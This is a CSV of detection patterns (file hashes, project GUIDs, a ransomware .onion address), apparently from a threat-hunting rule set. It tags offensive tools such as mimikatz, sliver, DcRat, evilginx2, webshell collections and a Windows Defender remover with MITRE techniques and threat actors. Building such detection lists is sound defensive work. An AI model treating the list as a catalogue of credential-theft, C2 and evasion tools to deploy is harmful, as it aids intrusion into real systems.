"*a222df9c30fc7adacb7553a9899a3512e18b9e8d2b735bcd5210c800ba99b243*",".{0,1000}a222df9c30fc7adacb7553a9899a3512e18b9e8d2b735bcd5210c800ba99b243.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32304"
"*a2358b98f2f8c2d58f2314043c9207dae176eea11260788d7a2d67cb82f39cc9*",".{0,1000}a2358b98f2f8c2d58f2314043c9207dae176eea11260788d7a2d67cb82f39cc9.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","32309"
"*a236a082af48fe2e9a9a0ca59bfc1804e67b1c31755d26cbac7e6ca167a66fe4*",".{0,1000}a236a082af48fe2e9a9a0ca59bfc1804e67b1c31755d26cbac7e6ca167a66fe4.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","32310"
"*a239aa784fa1dfdd3bb50c20c21b03dbc3ce364f940bec5d23faca835c2e5417*",".{0,1000}a239aa784fa1dfdd3bb50c20c21b03dbc3ce364f940bec5d23faca835c2e5417.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32312"
"*a243a5df3e04b3a555b3f506b36037d0093a22c0b8e5842a8890bc4610855cdb*",".{0,1000}a243a5df3e04b3a555b3f506b36037d0093a22c0b8e5842a8890bc4610855cdb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32313"
"*a243b7196d9fb7977aa29002a42977d87b1141857421c8b5a4b8b3ef3a5cb59b*",".{0,1000}a243b7196d9fb7977aa29002a42977d87b1141857421c8b5a4b8b3ef3a5cb59b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32314"
"*a243f92822a73f788a7ea29fedbbaf39ce10b70535d21eb8a9ad86a68109ffb8*",".{0,1000}a243f92822a73f788a7ea29fedbbaf39ce10b70535d21eb8a9ad86a68109ffb8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32315"
"*a24bd6262d411361edc53e8524b6ed92bccc046af52ac1218f51c9f810109796*",".{0,1000}a24bd6262d411361edc53e8524b6ed92bccc046af52ac1218f51c9f810109796.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32317"
"*a25b9df135c7a09348526cb0ffdd1e486b7cc6c16df811d83ef1d5402ec1f8ad*",".{0,1000}a25b9df135c7a09348526cb0ffdd1e486b7cc6c16df811d83ef1d5402ec1f8ad.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32320"
"*a25c5e7baec3573c2a78872808c709d702714f3a11e57d06b62244c3eca2a834*",".{0,1000}a25c5e7baec3573c2a78872808c709d702714f3a11e57d06b62244c3eca2a834.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","32321"
"*a260d61fe0bc252fa2f2ea9abba5db96cf21bb8d786fcaf973c5e9cdf9af63c8*",".{0,1000}a260d61fe0bc252fa2f2ea9abba5db96cf21bb8d786fcaf973c5e9cdf9af63c8.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32322"
"*a27020a4b91eee6301ac4b67eb12224436692ff4e8bedcfdbe8f31ffb0f4da91*",".{0,1000}a27020a4b91eee6301ac4b67eb12224436692ff4e8bedcfdbe8f31ffb0f4da91.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","32326"
"*a276ed1739c3380b2e918da23ddac04cc117e17e08dac219bb4f82783f9f9850*",".{0,1000}a276ed1739c3380b2e918da23ddac04cc117e17e08dac219bb4f82783f9f9850.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#filehash","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","32328"
"*A2791A8889432638BC1ADB213A1CF50E9B07439442D77D6057C635778789CC82*",".{0,1000}A2791A8889432638BC1ADB213A1CF50E9B07439442D77D6057C635778789CC82.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","32329"
"*a27fce6d1589930899c893f6026891b4b7cd9e0f42322985299a3ba523a3e40f*",".{0,1000}a27fce6d1589930899c893f6026891b4b7cd9e0f42322985299a3ba523a3e40f.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","32332"
"*a280f960cb4fc01ec2dbb4fe56f17122523878a9ece3713868244fbd95e7d7e6*",".{0,1000}a280f960cb4fc01ec2dbb4fe56f17122523878a9ece3713868244fbd95e7d7e6.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","#filehash","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","32333"
"*a285f5f5627c483cdc0a2d2110ea1840ae221bcbf836a186822835653db93a71*",".{0,1000}a285f5f5627c483cdc0a2d2110ea1840ae221bcbf836a186822835653db93a71.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","32335"
"*a287b6d1ff18dab39efbf0b4c6937507f388923cbb47e66d72938aa87912bc20*",".{0,1000}a287b6d1ff18dab39efbf0b4c6937507f388923cbb47e66d72938aa87912bc20.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","32336"
"*a28d627deaf54fdabd986ea28160bff5c469f53dc5be72ddd58b3bff89ab1e89*",".{0,1000}a28d627deaf54fdabd986ea28160bff5c469f53dc5be72ddd58b3bff89ab1e89.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","32337"
"*a29c6f59fa8fc621166577447b14cbb8b4c0c4e29eb02427d359beade9148033*",".{0,1000}a29c6f59fa8fc621166577447b14cbb8b4c0c4e29eb02427d359beade9148033.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32338"
"*a2a63c273505a6ee6580bf6d77a7c510f6fba4496e04efd6656f920b477dad69*",".{0,1000}a2a63c273505a6ee6580bf6d77a7c510f6fba4496e04efd6656f920b477dad69.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32341"
"*a2a8f773388c06df995500e1d74e8855b11771b21474af4efad67362cc32119e*",".{0,1000}a2a8f773388c06df995500e1d74e8855b11771b21474af4efad67362cc32119e.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32343"
"*a2a8f773388c06df995500e1d74e8855b11771b21474af4efad67362cc32119e*",".{0,1000}a2a8f773388c06df995500e1d74e8855b11771b21474af4efad67362cc32119e.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32344"
"*a2b03c173484ada281f36aeabeedc6ced6d4289d4c204aa69b8a65c3f45037db*",".{0,1000}a2b03c173484ada281f36aeabeedc6ced6d4289d4c204aa69b8a65c3f45037db.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","32346"
"*a2b0e31afa53dfc587fa9e80abddbb6bb01d1050d5e68359f6f298a84fa6625e*",".{0,1000}a2b0e31afa53dfc587fa9e80abddbb6bb01d1050d5e68359f6f298a84fa6625e.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","#filehash","N/A","10","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","32347"
"*a2b402f23bed2afebdda5ca21f7bc705a021ad86a35676cd3b55c7aa56406e0f*",".{0,1000}a2b402f23bed2afebdda5ca21f7bc705a021ad86a35676cd3b55c7aa56406e0f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32348"
"*a2ba6578e740b1a7369d79eb4087f99a3c5ab082def76bb7510e14fff041283b*",".{0,1000}a2ba6578e740b1a7369d79eb4087f99a3c5ab082def76bb7510e14fff041283b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32349"
"*a2be75dd7462fbb4753ae380a987351c51d6cd41ba5cc41f08242feeec1df06f*",".{0,1000}a2be75dd7462fbb4753ae380a987351c51d6cd41ba5cc41f08242feeec1df06f.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","#filehash","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","32350"
"*a2c2db4fb0e2ec86fbdda64d1fdf5a084d036073ffd366c1c56336c4c5c95bf1*",".{0,1000}a2c2db4fb0e2ec86fbdda64d1fdf5a084d036073ffd366c1c56336c4c5c95bf1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32351"
"*a2cc2a768feea8a8a34cc907067758bf7560aa7719deddd676d8a5d521dae63e*",".{0,1000}a2cc2a768feea8a8a34cc907067758bf7560aa7719deddd676d8a5d521dae63e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32353"
"*a2d412b6feac0c34d148158e5791940e5060bf4b9e6db33e7c444bf715553dc6*",".{0,1000}a2d412b6feac0c34d148158e5791940e5060bf4b9e6db33e7c444bf715553dc6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32354"
"*a2d9e1816e8f4f6a4bbb1a0b19c0805b1a2b221615d5038740a5903be8ed7cc3*",".{0,1000}a2d9e1816e8f4f6a4bbb1a0b19c0805b1a2b221615d5038740a5903be8ed7cc3.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","32355"
"*a2dbso6dijaqsmut36r6y4nps4cwivmfog5bpzf6uojovce6f3gl36id.onion*",".{0,1000}a2dbso6dijaqsmut36r6y4nps4cwivmfog5bpzf6uojovce6f3gl36id\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","32356"
"*a2f2705bdc56aa0bde9c27639f9d8d430fe5151140a85feac95ed6537655fbc1*",".{0,1000}a2f2705bdc56aa0bde9c27639f9d8d430fe5151140a85feac95ed6537655fbc1.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","32358"
"*a306e29eb09842d5accb058f5dd939c9466ae664c1fe9915100c15e0a581b1f0*",".{0,1000}a306e29eb09842d5accb058f5dd939c9466ae664c1fe9915100c15e0a581b1f0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32360"
"*a3082e1d9f46b7d8878e3a87a0324eabff9731c12e8637e0a714929938a99177*",".{0,1000}a3082e1d9f46b7d8878e3a87a0324eabff9731c12e8637e0a714929938a99177.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","32361"
"*a314666c9d3b9d80540bb50378fe104b1c509fa239bc80567f26492f76c526b0*",".{0,1000}a314666c9d3b9d80540bb50378fe104b1c509fa239bc80567f26492f76c526b0.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32362"
"*A315E53B-397A-4074-B988-535A100D45DC*",".{0,1000}A315E53B\-397A\-4074\-B988\-535A100D45DC.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#GUIDproject","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","32363"
"*a315f75d50a2c54a6d1bb84cca077e6894870d8a1e60010ffd1307a295c8b9f7*",".{0,1000}a315f75d50a2c54a6d1bb84cca077e6894870d8a1e60010ffd1307a295c8b9f7.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","32364"
"*A318BEE3-2BDB-41A1-BE56-956774BBC12B*",".{0,1000}A318BEE3\-2BDB\-41A1\-BE56\-956774BBC12B.{0,1000}","offensive_tool_keyword","PrivFu","inspect token information","T1057","TA0007","N/A","N/A","Discovery","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","TokenDump","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","32365"
"*a324c19c7df7c2c63f4fc17bc8e1554e4261a27c18cd68c47cc08602f480d60f*",".{0,1000}a324c19c7df7c2c63f4fc17bc8e1554e4261a27c18cd68c47cc08602f480d60f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32367"
"*a32580495d4c71174e41935bf681c053aef15993a80c663f224790588b713742*",".{0,1000}a32580495d4c71174e41935bf681c053aef15993a80c663f224790588b713742.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","#filehash","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","32368"
"*a32cdeddc7deb6d2ac210ec304930da4e9c6763975d72685fd7108ad48883715*",".{0,1000}a32cdeddc7deb6d2ac210ec304930da4e9c6763975d72685fd7108ad48883715.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","#filehash","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","32369"
"*a336f517-bca9-465f-8ff8-2756cfd0cad9*",".{0,1000}a336f517\-bca9\-465f\-8ff8\-2756cfd0cad9.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","32370"
"*a337eb11ea8a12ec4bfbb0d1a3f939fe6105dea0836b5f9a037b67fa4dbd0b40*",".{0,1000}a337eb11ea8a12ec4bfbb0d1a3f939fe6105dea0836b5f9a037b67fa4dbd0b40.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32371"
"*a33909ee705e9f06d27bbca6b33048e5ce0c7caeb14281b726e0c5a32d8c3a42*",".{0,1000}a33909ee705e9f06d27bbca6b33048e5ce0c7caeb14281b726e0c5a32d8c3a42.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","32372"
